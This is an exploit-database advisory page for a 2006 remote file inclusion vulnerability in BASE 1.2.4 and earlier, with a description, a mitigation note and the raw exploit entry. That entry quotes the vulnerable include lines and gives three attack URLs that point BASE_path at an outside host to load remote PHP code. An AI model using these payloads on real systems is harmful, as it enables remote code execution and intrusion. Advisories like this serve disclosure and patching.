Basic Analysis and Security Engine (BASE)

vendor:

by:

milw0rm.com

7.5

CVSS

HIGH

Inclusion Vulnerabilities

CWE

Product Name: Basic Analysis and Security Engine (BASE)

Affected Version From: <= 1.2.4

Affected Version To: <= 1.2.4

Patch Exists: YES

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2006

Basic Analysis and Security Engine (BASE) <= 1.2.4 (melissa) Inclusion Vulnerabilities

The Basic Analysis and Security Engine (BASE) version <= 1.2.4 is vulnerable to inclusion vulnerabilities. The vulnerabilities can be exploited by an attacker to include arbitrary files from remote servers, leading to potential remote code execution or information disclosure.

Mitigation:

Upgrade to a patched version of BASE (>= 1.2.5) or apply appropriate security measures to prevent file inclusion vulnerabilities.

Source

Exploit-DB raw data:

# Basic Analysis and Security Engine (BASE) <= 1.2.4 (melissa) Inclusion Vulnerabilities
#   Just glanced over BASE for a pentesting job. /str0ke ! milw0rm.com
##################################

[code (base_qry_common.php)]
   include_once("$BASE_path/includes/base_signature.inc.php");
[/code]

http://[site]/snort/base_qry_common.php?BASE_path=http://www.milw0rm.com/index.php?&

########################################

[code (base_stat_common.php)]
   include_once("$BASE_path/includes/base_constants.inc.php");
[/code]

http://[site]/snort/base_stat_common.php?BASE_path=http://www.milw0rm.com/index.php?&

###############################################

[code (includes/base_include.inc.php)]
   include_once("$BASE_path/includes/base_db.inc.php");
   include_once("$BASE_path/includes/base_output_html.inc.php");
   include_once("$BASE_path/includes/base_state_common.inc.php");
   ...
[/code]

http://[site]/snort/includes/base_include.inc.php?BASE_path=http://www.milw0rm.com/index.php?&

#######################################################

# milw0rm.com [2006-05-25]